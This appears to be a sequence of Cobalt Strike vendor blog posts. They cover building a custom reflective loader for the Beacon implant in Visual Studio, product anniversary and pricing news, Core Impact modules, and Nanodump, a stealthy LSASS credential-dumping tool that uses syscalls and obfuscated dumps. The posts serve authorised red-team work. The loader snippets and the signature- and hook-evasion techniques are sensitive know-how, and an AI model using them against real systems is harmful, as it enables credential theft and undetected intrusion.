Revisiting the User-Defined Reflective Loader Part 1: Simplifying Development

 

This blog post accompanies a new addition to the Arsenal Kit – The User-Defined Reflective Loader Visual Studio (UDRL-VS). Over the past few months, we have received a lot of feedback from our users that whilst the flexibility of the UDRL is great, there is not enough information/example code to get the most out of this feature. The intention of this kit is to lower the barrier to entry for developing and debugging custom reflective loaders. This post includes a walkthrough of creating a UDRL in Visual Studio that facilitates debugging, an introduction to UDRL-VS, and an overview of how to apply a UDRL to Beacon.

Note: There are many people out there that prefer to use tools such as MingGW/GCC/LD/GDB etc. and we salute you. However, this post is intended for those of us that like the simplicity of Visual Studio and enjoy a GUI. To develop this template we used Visual Studio Community 2022.

Reflective Loading

Beacon is just a Dynamic Link Library (DLL). As a result, it needs to be “loaded” for us to work with it. There are many different ways to load a DLL in Windows, but Reflective DLL Injection, first published by Stephen Fewer in 2008, provides the means to load a DLL completely in memory. There is a lot of information available regarding PE files, reflective loading, and even improving upon Reflective DLL Injection. Therefore, this post will not delve into this in much detail. Fundamentally though, a reflective loader must:

  • Allocate some memory.
  • Copy the target DLL into that memory allocation.
  • Parse the target DLL’s imports/load the required modules/resolve function addresses.
  • Rebase the DLL (fix the relocations).
  • Locate the DLL’s Entry Point.
  • Execute the Entry Point.

In Stephen Fewer’s original implementation, the code used to load the DLL into memory is compiled into the DLL and “exported” as a function. This is how Beacon’s default reflective loader works; if you inspect Beacon’s exported functions you’ll find one called ReflectiveLoader() which is where the magic happens. The following screenshot shows Beacon’s Export Address Table (EAT) and its ReflectiveLoader() function in CFF Explorer.

Figure 1. Beacon’s Export Address Table in CFF Explorer.

Note: Typically, when a reflective loader is implemented in this fashion, a small shellcode stub is also written to the start of the PE file (over the DOS header) to ensure that execution is correctly directed to the right place (the ReflectiveLoader() function). This is what makes it position independent as it’s possible to simply write the reflective DLL to memory, start a thread and let it run.

In 2017, an analysis of the Double Pulsar User Mode Injector (Double Pulsar) leaked by Shadow Brokers showed an alternate approach to reflective loading (archive link). Double Pulsar differed because it was not compiled into the DLL but prepended in front of it. This approach allowed it to reflectively load any DLL. Later in 2017, the Shellcode Reflective DLL Injection (sRDI) project was released which used a similar approach. sRDI is able to take an arbitrary PE file and make it position independent which means it can also be used to load Beacon.

The following high-level diagram shows the different locations of the reflective loader between Stephen Fewer’s approach and Double Pulsar.

Figure 2. The different locations of ReflectiveLoader().

The User-Defined Reflective Loader (UDRL)

The UDRL is an important aspect of Cobalt Strike’s evasion strategy. Cobalt Strike achieves “evasion through flexibility”, meaning we give you the tools you need to modify default behaviors and customize Beacon to your liking. This was something that Raphael Mudge felt strongly about and will remain a key part of the Cobalt Strike strategy moving forward.

As described above, Beacon’s default ReflectiveLoader() is compiled into Beacon and exported. As a result, the UDRL was originally intended to work in the same fashion. The Teamserver would take a given UDRL and use it to overwrite Beacon’s default ReflectiveLoader() function. A great example of a UDRL that utilizes this workflow is BokuLoader by Bobby Cooke.

In this blog post, we’ll be exploring the same approach used by Double Pulsar and will therefore append Beacon to our loader as shown in Figure 2. TitanLdr by Austin Hudson is an excellent example of a UDRL that uses this approach. AceLdr by Kyle Avery is another very good example that also includes some additional functionality for avoiding memory scanners.

There are likely many other UDRLs available, and without a doubt even more that have not been made public. The above projects have been mentioned as they are impressive public examples. If you’ve developed a UDRL for Cobalt Strike yourself and you’d like to share it, you can submit it to the Cobalt Strike Community Kit.

Enter Visual Studio

The original UDRL example provided in the Arsenal Kit is a slightly modified version of Stephen Fewer’s reflective loader, so here we’ll also start in the same place. To save a lot of unnecessary content, we will not cover the process of creating an empty Visual Studio project and copy/pasting code. The only slight difference at this stage however is that our project files were created with the .cpp extension. This minor change to .cpp allows the project to access some additional functionality (more on this later). For clarity, the folder layout of the project after copy/pasting Stephen Fewer’s code has been illustrated below.

UDRL-VS/
├── Header Files/
│ ├── ReflectiveDLLInjection.h
│ └── ReflectiveLoader.h
├── Source Files/
└── ReflectiveLoader.cpp

The purpose of this Visual Studio project is to create a PE executable file that contains our reflective loader. This executable file can then be compiled in either Debug mode or Release mode. In Debug mode it can be used in combination with Visual Studio’s debugger to step through the code and Debug our loader. In Release mode, we can strip our loader out of the resulting executable and prepend it to Beacon to create a Double Pulsar style payload as illustrated in Figure 2.

To compile the project and ensure that it executes correctly, we need to change some of Visual Studio’s Project Settings. These have been outlined below:

  • Entry Point (ReflectiveLoader) – This setting changes the default starting address to Stephen Fewer’s ReflectiveLoader() function. A custom entry point would normally be problematic for a traditional PE file and require some manual initialization. However, Stephen Fewer’s code is position independent, so this won’t be a problem.
  • Enable Intrinsic Functions (Yes) – Intrinsic functions are built into the compiler and make it possible to “call” certain assembly instructions. These functions are “inlined” automatically which means the compiler inserts them at compile time.
  • Ignore All Default Libraries (Yes) – This setting will alert us when we call external functions (as that would not be position independent).
  • Basic Runtime Checks (Default) – This setting is configured correctly in Release mode by default, but changing it in the Debug configuration disables some runtime error checking that will throw an error due to our custom entry point.
  • Optimization – We’ve enabled several of Visual Studio’s different Optimization settings and opted to favor smaller code where possible. However, at certain points in the template we’ve disabled it to ensure our code works as expected.

Note: Optimization can be great because it makes our code smaller and faster. However, it’s important to know what can be optimized and what can’t, which is made even more complex when writing position independent code. If you run into problems, it can be worth checking whether something is being optimized away by the compiler.

Function Positioning

In this post, we are using the Double Pulsar approach to reflective loading. Therefore, after compiling the Release build, we will extract the loader from the resulting executable and prepend it to Beacon to create our payload. As part of this model, we need to ensure that the loaders’ entry point sits at the very start of the shellcode. We also need to make sure that we can identify the end of the loader in order to find out where Beacon begins. This has been illustrated in the following high-level diagram:

Figure 3. A high-level overview of Function Positioning.

There are different ways to achieve this “positioning”, however, for the purposes of this template we have used the code_seg pragma directive. code_seg can be used to specify which section is used to store specific functions. These sections can then be ordered using alphabetical values e.g .text$a. This is possible because the linker takes the section names and splits them at the first dollar sign, the value after it is then used to sort the sections which facilitates the alphabetical ordering. A similar approach to function ordering can also be seen in both TitanLdr/AceLdr in link.ld.

In the example below, we have placed the ReflectiveLoader() function within .text$a to ensure that it is positioned at the start of the .text section and therefore the start of the payload. The remaining functions in ReflectiveLoader.cpp have been placed inside .text$b to ensure that they are located after ReflectiveLoader(). The compiler can order the functions within a given section however it chooses, so this approach of using $a and $b enforces the required layout.

#pragma code_seg(".text$a")
ULONG_PTR WINAPI ReflectiveLoader(VOID) {
[…SNIP…]
}
#pragma code_seg(".text$b")
[…SNIP…]

Note: In some public examples of reflective loaders, a small shellcode stub is used at the very start of execution to ensure stack alignment. This approach is not explicitly required in our template at this point as the loader is intended for use with memory allocation/thread creation APIs for simplicity. It should therefore be aligned correctly. If you do require this stack alignment, it would still be possible to use a similar shellcode stub in this model but it can be left as an exercise for the reader. Matt Graeber’s Writing Optimized Windows Shellcode in C and the associated PIC_Bindshell code demonstrate this. In addition, it can also be found in TitanLdr/Aceldr in start.asm.

We can use the same approach described above to also locate the end of the loader. In the code snippet below, we have used the code_seg directive once more to position the LdrEnd() function. Previously, we used $a to position ReflectiveLoader() at the start of the .text section and here we are using $z to position LdrEnd() at the end of it.

#pragma code_seg(".text$z")
void LdrEnd() {}

The following high-level diagram illustrates the code sections described above.

Figure 4. A high-level overview of Function Positioning with alphabetical values.

The Release build is designed to work with the Teamserver which will append Beacon to our loader. As part of the Debug build, we need to simulate the Release mode behavior. The code_seg directive can also be used in combination with the declspec allocate specifier to position the contents of data items. In the example below, we use the code_seg directive to specify a section, and then use the declspec specifier to place the contents of Beacon.h (unsigned char beacon_dll[]) within it. This logic was placed in End.h/End.cpp for simplicity.

#ifdef _DEBUG
#pragma code_seg(".text$z")
__declspec(allocate(".text$z"))
#include "Beacon.h"
#endif

The folder layout after adding the above files to the project has been illustrated below.

UDRL-VS/
├── Header Files/
│   ├── Beacon.h
│   ├── End.h
│   ├── ReflectiveDLLInjection.h
│   └── ReflectiveLoader.h
├── Source Files/
    ├── End.cpp
    └── ReflectiveLoader.cpp

This is the crux of our development environment, by positioning LdrEnd()/Beacon.h we’re able to easily find the location of Beacon. This change to Stephen Fewer’s original code has been shown below.

#ifdef _DEBUG
    uiLibraryAddress = (ULONG_PTR)beacon_dll;
#elif _WIN64
    uiLibraryAddress = (ULONG_PTR)&ldr_end + 1;
[…SNIP…]
#endif

Note: The x86 version of the Release build works in a slightly different fashion to the one described above. Positioning LdrEnd() and referencing its address works in x64 because the compiler identifies it using relative addressing. Disassembling the binary shows a “load effective address” at [rip + offset] (LEA RSI,[RIP+0X6B9]). This approach does not work in x86 because the absolute address of LdrEnd() is calculated at compile time. Therefore, it points to a completely incorrect location when the loader is prepended to Beacon (MOV EBX, 0X401600). To provide support for x86, we recycled Stephen Fewer’s caller() function in our template and renamed it to GetLocation(). This function simply returns the calling function’s return address via the _ReturnAddress() intrinsic function. Instead of referencing the address of LdrEnd() in x86, we call it, which in turn calls GetLocation(). We then use simple pointer arithmetic to work out the location of Beacon. We could’ve done this for both x86 and x64 but included both to show the two approaches and highlight the difference.

At this point, we now have an operational Debug build. We can set a breakpoint, click “Local Windows Debugger”, and use all the features of Visual Studio’s debugger.

The UDRL-VS Kit

In the previous section we used Stephen Fewer’s original reflective DLL injection code to show that only minor modifications were required to get up and running. However, we wanted to take this a step further and provide a template to support developing and debugging UDRLs for Cobalt Strike.

As part of creating this template, we have attempted to simplify Stephen Fewer’s original code by splitting it into separate functions, removing unused code, updating types and providing more descriptive variable names. In addition, we have also provided some helper functions to speed up writing position independent code (PIC). The following sections provide an overview of these helper functions. For additional help writing PIC, there is an excellent public framework available called ShellcodeStdio that also demonstrates the techniques described below.

Compile Time Hashing

In Stephen Fewer’s original code, several hashes had been pre-calculated and included in ReflectiveLoader.h. This solution works well, but to simplify it further and make it easier for you to include your own hashes, we have added “compile time hashing”.

As the CPP reference states, the “constexpr” specifier makes it possible to “evaluate the value of a function or variable at compile time”. Therefore, it is possible to use the constexpr specifier as part of a hash function to ensure that the hash is generated at compile time. This means instead of pre-calculating hashes and including them in our header file, we can have the compiler/preprocessor hash our strings for us.

Note: Compile time hashing will help us more in a subsequent post, but at this point, an added benefit is that it makes it easier to rotate Stephen Fewer’s HASH_KEY value used to hash the strings. It is not a silver bullet but changing the HASH_KEY could help to push back on simple static signatures.

In the template, we have replaced Stephen Fewer’s static hash values with calls to CompileTimeHash().

constexpr DWORD KERNEL32DLL_HASH = CompileTimeHash("kernel32.dll");
constexpr DWORD NTDLLDLL_HASH = CompileTimeHash ("ntdll.dll");

constexpr DWORD LOADLIBRARYA_HASH = CompileTimeHash("LoadLibraryA");
constexpr DWORD GETPROCADDRESS_HASH = CompileTimeHash("GetProcAddress");
constexpr DWORD VIRTUALALLOC_HASH = CompileTimeHash("VirtualAlloc");
constexpr DWORD NTFLUSHINSTRUCTIONCACHE_HASH = CompileTimeHash("NtFlushInstructionCache");

Note: We have also modified the original hash() function in the template to normalize strings to uppercase before hashing so that “lOadLiBrarYa” and “LoadLibraryA” result in the same hash.

PRINT()

It can be helpful to print strings as part of debugging, but as we mentioned earlier, a custom entry point can affect startup routines, etc. This means that at the start of execution we do not have direct access to the C/C++ standard library or any Windows APIs.

As part of simplifying Stephen Fewer’s original code, we broke it down into independent functions. As a result, we now have a GetProcAddressByHash() function in Utils.cpp that we can use to resolve function addresses. To save a lot of time and effort we have used this to create a _printf() function for Debug purposes and included it in our template. This _printf() function works in the same way as the original printf() so you can give it format specifiers and use it to print variables, etc. We also wrapped it into a macro called PRINT() which will only generate the _printf() calls when the project is compiled in Debug mode.

PRINT("[+] Beacon Start Address: %p\n", beaconBaseAddress);

Here is a screenshot of the above function in action. We have printed the location of Beacon and then found it using the disassembly view in Visual Studio.

Figure 5. Finding Beacon’s MZ Header with a call to PRINT().

Strings

Strings are saved into the .data/.rdata section of a PE file and will therefore be unavailable once we extract the loader (which will be exclusively found in the .text section). It’s therefore important to understand how strings are created and stored within a PE file. Compiler Explorer is an excellent website for seeing how your code is assembled and even color codes the input/output. The following screenshot shows three different approaches to declaring strings in C++.

Figure 6. A demonstration of how strings are created and stored with Compiler Explorer.

The first declaration uses an array initializer; this has been highlighted in yellow. The output window shows how move instructions are used to construct the string one byte at a time. This means that all the code is found within the .text section.

The next approach uses a string literal to initialize the data. As shown in the purple output, the bytes of the string are copied into the array from the .data section. This has been broken down and explained below.

lea    rax, QWORD PTR string$[rsp]     ; load the address of where the string will be on the stack (destination address)
lea    rcx, OFFSET FLAT : $SG2657      ; load the address of the string in the .data section (source address)
mov    rdi, rax			       ; save destination address into destination pointer (RDI)
mov    rsi, rcx			       ; save source address into source pointer (RSI)
mov    ecx, 12 			       ; save the size of the string into the count register (ECX)
rep    movsb  		               ; move a single byte from RDI to RSI and repeat based on ECX (size of string)

In the final example, a char pointer is initialized with a string literal. As shown in the red output, it references the value in the .data section. This has also been broken down and explained below.

lea    rax, OFFSET FLAT:$SG2658        ; load the address of the string in the .data section
mov    QWORD PTR stringPtr$[rsp], rax  ; save the address of the string on the stack

After reviewing the above, we can see the only real option for us when writing PIC is to either avoid using strings (not always possible) or use the first approach in the example above.

char helloWorld[] = {'H','e','l','l','o',' ','W','o','r','l','d','\0'};

As with everything when writing PIC, this is a little clumsy and cumbersome. However, Evan McBroom has provided a very simple and elegant solution to this problem. Evan discovered that when using the constexpr specifier to initialize a char array with a string literal, the resulting string was constructed in the same fashion as the array initializer described above. The following screenshot demonstrates this with Compiler Explorer.

Figure 7. A demonstration of Evan McBroom’s PIC string with Compiler Explorer.

Evan wrapped this into two macros that can be used to create both ASCII strings and wide strings.

#define PIC_STRING(NAME, STRING) constexpr char NAME[]{ STRING }
#define PIC_WSTRING(NAME, STRING) constexpr wchar_t NAME[]{ STRING }

We have added these two macros to the template, this can be seen in the following example.

PIC_STRING(example, "[!] Hello World\n");
PRINT(example);

Release Mode

The ability to develop and debug inside Visual Studio is great, but what about using this loader in production? The great thing about writing a PIC loader is that everything we need is located inside the resulting PE files’ .text section. This means we can use a simple Python script to extract our compiled executable’s .text section and voila, we have our UDRL!

Note: This is why we used the “Function Positioning” described earlier. We needed to ensure that our ReflectiveLoader() function was positioned correctly at the very start of the .text section, which becomes the very start of the UDRL (aka the loader).

There are many examples of Python scripts that do something similar; both TitanLdr and AceLdr have similar scripts in their respective repositories. We have also included a script in the Arsenal kit template called udrl.py. Visual Studio allows us to incorporate this script as a post-build event and so the Release build will automatically create udrl-vs.bin in the relevant Output Directory.

To simplify testing and development, udrl.py also facilitates shellcode execution. This allows you to quickly test the loader without having to go via the Teamserver. We’d strongly recommend using this frequently to test your work. When writing PIC, things will often work in Debug mode but not in Release mode. For example, you can easily be caught out by forgetting the constepxr specifier, by forgetting to initialize pointers, or by using strings that aren’t PIC.

C:\> py.exe udrl.py prepend-udrl .\beacon.x64.bin .\x64\Release\udrl-vs.exe

            _      _
           | |    | |
  _   _  __| |_ __| |  _ __  _   _
 | | | |/ _` | '__| | | '_ \| | | |
 | |_| | (_| | |  | |_| |_) | |_| |
  \__,_|\__,_|_|  |_(_) .__/ \__, |
                      | |     __/ |
                      |_|    |___/

[+] Success: Extracted loader
[*] Size of loader: 1229
[+] Start Address: 0x1b690d90000
[+] Shellcode Executed

Note: Make sure to use the 32-bit version of Python when testing x86 loaders. It will save you a couple of minutes of confusion…

Previously we used the Double Pulsar approach to loading because it simplified our Development/Debugging and provided an alternate way to write a UDRL. However, there is no reason why we can’t still use the “original” UDRL workflow and simply replace Beacon’s default loader with the one we have created.

The UDRL-VS template contains an additional Build Configuration called “Release (Stephen Fewer)”. This Build Configuration still creates the same PIC loader, however, instead of using the LdrEnd() function to calculate the location of Beacon, it uses Stephen Fewer’s original approach of walking backward through memory to find the start address of the DLL that is being loaded (Beacon).

To make it easy to test this type of loader, we have also included an option in udrl.py to overwrite Beacon’s default loader and execute the resulting payload.

C:\> py.exe udrl.py stomp-udrl .\beacon.x64.bin ".\x64\Release (Stephen Fewer)\udrl-vs.exe"

            _      _
           | |    | |
  _   _  __| |_ __| |  _ __  _   _
 | | | |/ _` | '__| | | '_ \| | | |
 | |_| | (_| | |  | |_| |_) | |_| |
  \__,_|\__,_|_|  |_(_) .__/ \__, |
                      | |     __/ |
                      |_|    |___/

[+] Success: Extracted loader
[*] Size of loader: 1277
[*] Found ReflectiveLoader - RVA: 0x17aa4       File Offset: 0x16ea4
[+] Success: Applied UDRL to DLL
[+] Start Address: 0x27239a20000
[+] Shellcode Executed

Once your loader has been tested and works as expected, it can be used in combination with an Aggressor Script to make it operational. We don’t strictly need to use Aggressor. We could use a script like udrl.py to create the payload, however, Aggressor Script has several functions that will simplify customization in subsequent posts and saves writing extra code.

We can use some very simple Aggressor Scripts to apply our loaders to Beacon. The following example demonstrates how to append Beacon to our loader (almost a carbon copy of the one used by TitanLdr/AceLdr).

set BEACON_RDLL_GENERATE {
        # Declare local variables
	local('$arch $beacon $fileHandle $ldr $path $payload');
	$beacon = $2;
	$arch = $3;
	
	# Check the payload architecture
	if($arch eq "x64") {
            $path = getFileProper(script_resource("x64"), "Release", "udrl-vs.bin");
	} 
        else if ($arch eq "x86") {
            $path = getFileProper(script_resource("Release"), "udrl-vs.bin");
	}
        else {
            warn("Error: Unsupported architecture: $arch");
            return $null;
        }

	# Read the UDRL from the supplied binary file
	$fileHandle = openf( $path );
	$ldr = readb( $fileHandle, -1 );
	closef( $fileHandle );
	if ( strlen( $ldr ) == 0 ) {
		warn("Error: Failed to read udrl-vs.bin");
		return $null;
	}

	# Prepend UDRL to Beacon and output the modified payload.
	return $ldr.$beacon;
}

The following example demonstrates how to overwrite Beacon’s default loader with our own. We still read the loader in the same fashion, but this time we call setup_reflective_loader(). This function does the heavy lifting for us; it finds the current ReflectiveLoader() function in Beacon and replaces it with the one provided.

set BEACON_RDLL_GENERATE {	
        # Declare local variables
	local('$arch $beacon $fileHandle $ldr $path $payload');
	$beacon = $2;
	$arch = $3;
	
	# Check the payload architecture.
	if($arch eq "x64") {
            $path = getFileProper(script_resource("x64"), "Release (Stephen Fewer)", "udrl-vs.bin");
        } 
        else if ($arch eq "x86") {
            $path = getFileProper(script_resource("Release (Stephen Fewer)"), "udrl-vs.bin");
	}
        else {
            warn("Error: Unsupported architecture: $arch");
            return $null;
        }

	# Read the UDRL from the supplied binary file
	$fileHandle = openf( $path );
	$ldr = readb( $fileHandle, -1 );
	closef( $fileHandle );
	if ( strlen( $ldr ) eq 0 ) {
		warn("Error: Failed to read udrl-vs.bin");
		return $null;
	}

	# Overwrite Beacon's ReflectiveLoader() with UDRL
	$payload = setup_reflective_loader($beacon, $ldr);
	

	# Output the modified payload.
	return $payload;
}

If we load either of the scripts above into Cobalt Strike and export a payload, we’ll see a message in the Script Console confirming that the custom loader was used. The resulting shellcode can then be used in combination with a Stage0 of your choosing.

Closing Thoughts

That concludes the first post of this series Revisiting the UDRL. As part of this post we have created a Visual Studio project with several Quality of Life (QoL) improvements. We’re now able to develop, debug and operationalize both Stephen Fewer’s original reflective loader and the Double Pulsar concept for Cobalt Strike using Visual Studio. The template developed as part of this project can be found in the Arsenal Kit under udrl-vs in “kits”. In the next installment we’ll explore some evasive techniques as well as how to modify default behaviors.

Celebrating 10 Years of Cobalt Strike

 

Can you believe it? Cobalt Strike is 10 years old! Think back to the summer of 2012. The Olympics were taking place in London. CERN announced the discovery of a new particle. The Mars Rover, Curiosity, successfully landed on the red planet. And despite the numerous eschatological claims of the world ending by December, Raphael Mudge diligently worked to create and debut a solution unique to the cybersecurity market.

Raphael designed Cobalt Strike as a big brother to Armitage, his original project that served as a graphical cyber-attack management tool for Metasploit. Cobalt Strike quickly took off as an advanced adversary emulation tool ideal for post-exploitation exercises by Red Teams.

Flash forward to 2022 and not only is the world still turning, Cobalt Strike continues to mature, having become a favorite tool of top cybersecurity experts. The Cobalt Strike team has also grown accordingly, with more members than ever working on research activities to further add features, enhance security, and fulfill customer requests. With version 4.7 nearly ready, we’re eager to show you what we’ve been working on.

However, we’d be remiss not to take a moment to pause and thank the Cobalt Strike user community for all you’ve done to contribute over the years to help this solution evolve. But how could we best show our appreciation? A glitter unicorn card talking about “celebrating the journey”? A flash mob dance to Hall & Oates’ “You Make My Dreams Come True”? Hire a plane to write “With users like you, we’ve Cobalt Struck gold!” It turns out that that it is very difficult to express gratitude in a non-cheesy way, but we’ve tried our best with the following video:


Building Upon a Strong Foundation

 

In the weeks ahead, Cobalt Strike 4.6 will go live and will be a minor foundational release before we move into our new development model. This release will be less about features and is more focused on bolstering security even further. This is all in preparation for a much bigger release later, which will also serve as a celebration of Cobalt Strike’s 10th birthday. As we approach this 10-year anniversary, we’ve also taken the time to reflect on the incredible journey of this product.

Raphael Mudge created and developed Cobalt Strike for many years, entirely on his own. With the acquisition by HelpSystems more than two years ago, additional support came along to bring about some great new features, including the reconnect button, new Aggressor Script hooks, the Sleep Mask Kit, and the User Defined Reflective Loader (UDRL).

Now, with Raphael’s vision always in mind, we have a growing team focused on supporting this solution to bring more stability and flexibility. We’re also dedicating additional resources to research activities, with the goal of creating and releasing new tools into the Community Kit and the Cobalt Strike arsenal. Additionally, we are placing a great deal of emphasis on the security of the product itself in order to prevent misuse by malicious, non-licensed users.

With this increased investment comes additional costs and a pricing change. In appreciation for current Cobalt Strike users and their support of the solution, the change will not affect existing customer renewals. The price of Cobalt Strike for new licenses and customers will be $5,900 per user ($3540 when bundled with other offensive security products) for a one-year license.*

The pricing for the Offensive Security – Advanced Bundle of Cobalt Strike and Core Impact will remain the same so you can pair any version of Core Impact—basic, pro, or enterprise—with Cobalt Strike at a reduced cost. Cobalt Strike’s interoperability with Core Impact highlights another one of the advantages of being part of a company with an ever-growing list of cybersecurity offerings. Developers of these products work together to help organizations create a cohesive security strategy that provides full coverage of their environments.

As we continue to evolve with the threat landscape and strengthen Cobalt Strike accordingly, a permanent fixture in our strategy will always be to listen to our customers. Many aspects of our updates are a direct result of customer feedback, so we encourage you to keep being vocal about the features that you most want to see. 

*US Pricing Only

Incorporating New Tools into Core Impact

 

Core Impact has further enhanced the pen testing process with the introduction of two new modules. The first module enables the use of .NET assemblies, while the second module provides the ability to use BloodHound, a data analysis tool that uncovers hidden relationships within an Active Directory (AD) environment. In this blog, we’ll dive into how Core Impact users can put these new modules into action during their engagements.

In-memory .NET Assembly Execution

With the Core Impact “.NET Assembly Execution” module you can now include .NET assemblies in your engagements. This module accepts a path to a local executable assembly and runs it on a given target. You may pass arbitrary arguments, quoted or not, to this program as if you ran it from a command shell. It can be executed in a sacrificial process using the fork and run technique or inline in the agent process.

Sharing Resources: Core Impact and Cobalt Strike

Cobalt Strike, our adversary simulation tool that focuses on post-exploitation, also uses .NET assembly tools. The “.NET Assembly Execution” module is compatible with extensions commonly employed by Cobalt Strike users, providing an opportunity to broaden the reach of Core Impact. Any executions that employ the execute-assembly command in Cobalt Strike can be used as a shared resource when using both products for a testing engagement. Additionally, these two solutions can be bundled together.

Some modules used by Cobalt Strike that can be now used within Core Impact include:

AD Data Collection using BloodHound

Another module, “Get AD data with SharpHound (BloodHound Collector),” is based on the same technology as the first. It was developed to enable the usage of BloodHound during an Active Directory attack to facilitate the reconnaissance steps. Bloodhound works by analyzing data about AD collected from domain controllers and domain-joined Windows systems, quickly detecting complex attack paths for lateral movement, privilege escalation, and more. Users can now incorporate these capabilities into their engagements to help identify these attack paths before threat actors do.

Expand Your Security Tests Even Further

With the introduction of these modules, Core Impact continues to help unify security. In addition to these modules, Core Impact integrates with other security tools, including multiple vulnerability scanners, PowerShell Empire, Plextrac, and more. Core Impact is particularly aligned Cobalt Strike, with interoperability features like session passing as well as the new “.NET Assembly Execution” module.

Successful security testing involves both talented cybersecurity professionals and the right portfolio of tools. Solutions that work with one another can help to maximize resources, reduce console fatigue, and standardize reporting. Tools like Core Impact can help serve as a point of centralization, helping organizations to advance their vulnerability management programs without overcomplicating strategies.

Nanodump: A Red Team Approach to Minidumps

 

Motivation

It is known that dumping Windows credentials is a technique often utilized for everyday attacks by adversaries and, consequently, Red Teamers. This process has been out there for several years and is well documented by MITRE under the T1003.001 technique. Sometimes, when conducting a Red Team engagement, there may be some limitations when trying to go beyond the early detection of this technique to allow defenders to train complex manipulation and usage of the credentials.  

One of the options to overcome this limitation is to explicitly allow the execution of this technique. However, there is another way, which is both stealthier and more lightweight. The following article will dive into how it can be executed. 

Introduction 

ReactOS, is an interesting and valuable project for anyone interested in understanding the low-level code of a Windows-like OS. We found that starting with the less-resistant path and trying to compile minidump.c from ReactOS to be quite difficult. However, after carefully analyzing the minidump module from skelsec, we found information about the minidump file format. 

The minidump format is quite complex and has many structures, pointers, and sections. In order to keep things as simple as possible, we experimented with the minidump python module to remove and change several parts in order to understand if these were relevant. 

Streams 

A minidump is composed of multiple “streams” which are like sections that contain specific information. For example, ExceptionStream presumably contains information like the stack trace in case the minidump was created due to a crash. 

After testing with pypykatz we found that the only relevant streams were SystemInfoStream, ModuleListStream, and Memory64ListStream. This first finding simplified the process because limiting the number of streams reduced the processing that needed to be done. 

SystemInfoStream 

This stream has information about the Windows machine, and it is not related to LSASS itself. It has relevant information such as the Windows version and build number, but also less relevant fields such as the number of processors. 

We ended up setting all the fields that were not needed to NULL. This made the process of creating the minidump a lot simpler, as we were able to ignore irrelevant fields. 

ModuleListStream 

All of the DLLs LSASS loaded are listed in this stream. It is worth noting that, while this stream is important, for this exercise, it wasn’t necessary to include every single DLL.  

In fact, we were able to ignore most of them and kept only those that are relevant to mimikatz, such as kerberos.dll and wdigest.dll. This decision effectively made the size of the dump a lot smaller. 

Memory64ListStream 

The actual memory pages of the LSASS process can be found in this stream. However, it takes up a lot of space, so reducing its size was critical to reduce the overall dump size. We decided to ignore any page that met any of the following conditions: 

  • Page wasn’t committed 
  • Page marked as mapped 
  • Page protection equals PAGE_NOACCESS 
  • Page marked as PAGE_GUARD 

Ignoring all these pages did not break the analysis of mimikatz, but did effectively reduce the size of the dump. 

Final Size 

By taking out all the non-vital information from the dump we managed to reduce the dump from roughly 50MB down to 10MB. 

Obfuscation 

As explained earlier, another goal was to achieve some level of obfuscation. Given that the creation of the minidump is done programmatically, we had full control of the dump and thus could implement any obfuscation that we chose. 

We opted to corrupt the “magic bytes” (or signature) of the minidump file format, which is a simple, yet effective approach.  

Minidumps start with the string “PMDM” in big endian. Changing these magic bytes would make it more difficult to figure out if a block of memory is a minidump, and since this is at the very start of the file, the binary blob wouldn’t look like a minidump, not even at creation time. 

This modification did break mimikatz and pypykatz. We created a small bash post-dump script to restore the original format once the dump is on the tester’s machine. 

PID of LSASS 

To dump LSASS, you typically need to know the PID of the LSASS process. The action of listing all the running processes could be seen as an abnormal or suspicious activity. Running tasklist or even calling CreateToolhelp32Snapshot might be detected by advance security solutions. 

We decided to use the NtGetNextProcess syscall to loop over all the processes in the system until we found a process that had ‘lsass.exe’ loaded. This was a valid method to find the LSASS process and avoided having to go through the usual steps. 

Avoiding API calls 

Reducing the number of API calls was important for obvious reasons: userland hooks. The only Windows API call that nanodump calls is LookupPrivilegeValueW, which is used to enable SeDebugPrivilege. This privilege should already be enabled in most cases, but feel free to remove this call if you want to be even stealthier. Besides that, everything is done using syscalls to avoid userland hooks. 

Syscalls Support 

To use syscalls, we used SysWhispers2 so, there was no need to re-compile nanodump for every new version of Windows. We had to make a few changes to the code to avoid using global variables given that Beacon Object Files (BOF) do not support them. We also used InlineWhispers to build nanodump on Linux using Mingw. 

Fileless download 

We also wanted to have the possibility of downloading the dump using Beacon’s C2 channel without touching the disk. However, it can be written to a file if need be. 

No Beacon? No Problem 

As explained earlier, we initially started this project as part of our Red Team practice, allowing us to conduct complex threat actions. Sometimes we don’t need to go as far as deploying Beacon on each compromised machine, so we added the possibility to use the .EXE version of nanodump. The one limitation that exists for the EXE version is that you cannot use the fileless download feature, given that it relies on Cobalt Strike’s C2 channel for it. 

Conclusion 

While it was challenging creating a SYSCALL based minidump, it was also critical for many scenarios. Additionally, creating a malleable module capable of feeding the great mimikatz is a powerful and flexible approach. The idea of modularizing a software solution has been out there for many years and this context is even more important to improve the success and future updates facing strong and dynamic detection tools. 
 

Do it Yourself 

If you’re interested in using nanodump, we’ve posted the code to our Github.  

Credits 

Thanks to: 

  • Skelsec for his amazing work with minidump and pypykatz. 
  • freefirex from CS-Situational-Awareness-BOF at Trustedsec for many cool tricks for BOFs  
  • jthuraisamy for SysWhispers2 

How to Extend Your Reach with Cobalt Strike 

 

We’re often asked, “what does Cobalt Strike do?” In simple terms, Cobalt Strike is a post-exploitation framework for adversary simulations and Red Teaming to help measure your security operations program and incident response capabilities. Cobalt Strike provides a post-exploitation agent, Beacon, and covert channels to emulate a quiet long-term embedded actor in a network.  

If we as security testers and red teamers continue to test in the same ways during each engagement, our audience (i.e., the defensive side) will not get much value out of the exercises. It’s important to be nimble. Cobalt Strike provides substantial flexibility for users to change their behavior and adapt just as an adversary does. For example, Malleable C2 is a Command and Control language that lets you modify memory and network indicators to control how Beacon looks and feels on a network.  

Cobalt Strike was designed to be multiplayer. One of its foundational features is its ability to support for multiple users to access multiple servers and share sessions. Enabling participation from users with different styles and skillsets further varies behavior to enrich engagements.   

While there are also numerous built-in capabilities, one of which we’ll discuss below, they are limited to what the team adds to the tool. One of our favorite features of Cobalt Strike is its user developed modules, through which many of the built-in limits are overcome. In fact, users are encouraged to extend its capabilities with complementary tools and scripts to tailor the engagements to best meet the organization’s needs. We wanted to highlight a few ways we’ve recently seen Cobalt Strike users doing just that to conduct effective assessments.   

Interoperability with Core Impact 

Contrary to many perceptions, Cobalt Strike is actually not a penetration testing tool. As we mentioned earlier, we identify as a tool for post-exploitation adversary simulations and Red Team operations. However, we have recently begun offering interoperability with Core Impact, which is a penetration testing tool with features that align well with those of Cobalt Strike.  

